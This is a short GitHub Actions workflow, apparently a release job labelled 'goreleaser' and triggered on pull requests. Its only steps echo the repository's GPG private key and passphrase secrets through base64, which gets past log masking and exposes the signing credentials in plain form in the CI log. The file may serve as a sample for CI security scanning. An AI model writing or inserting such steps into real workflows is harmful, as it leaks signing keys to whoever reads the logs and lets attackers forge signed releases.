name: release
on:
  pull_request:
jobs:
  goreleaser:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ secrets.GPG_PRIVATE_KEY }}" | base64
      - run: echo "${{ secrets.PASSPHRASE }}" | base64
      